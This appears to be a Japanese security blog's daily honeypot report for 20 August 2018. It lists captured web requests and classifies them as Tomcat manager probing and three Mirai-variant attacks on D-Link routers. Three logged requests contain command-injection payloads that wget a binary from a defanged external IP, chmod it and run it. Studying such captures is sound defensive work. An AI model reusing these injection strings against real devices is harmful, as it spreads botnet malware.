WOWhoneypotの2018/08/20(月) (運用78日目)の簡易分析です。
本日の総アクセス件数は 40件です。以下が全アクセスログです。

35 2018-08-20 GET /
1 2018-08-20 HEAD /
1 2018-08-20 GET /manager/html
1 2018-08-20 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-20 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://50.115.166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-20 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11[.]199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$ 

本日は種類も少なく、わかりやすいです。検知したものは以下です。
・Tomcatの管理ページの調査行為
・D-Linkの脆弱性をつくMirai亜種LMAO/2.0
・D-Linkの脆弱性をつくMirai亜種Hakai/2.0
・D-Linkの脆弱性をつくMirai亜種Gemini/2.0

本日のハンティングログは以下です。全てMirai亜種です。

1 2018-08-20 wget hxxp://80.211.67[.]245/k
1 2018-08-20 wget hxxp://50.115.166[.]136/hakai.mips
1 2018-08-20 wget hxxp://178.128.11[.]199/qtx.mips 

以上です。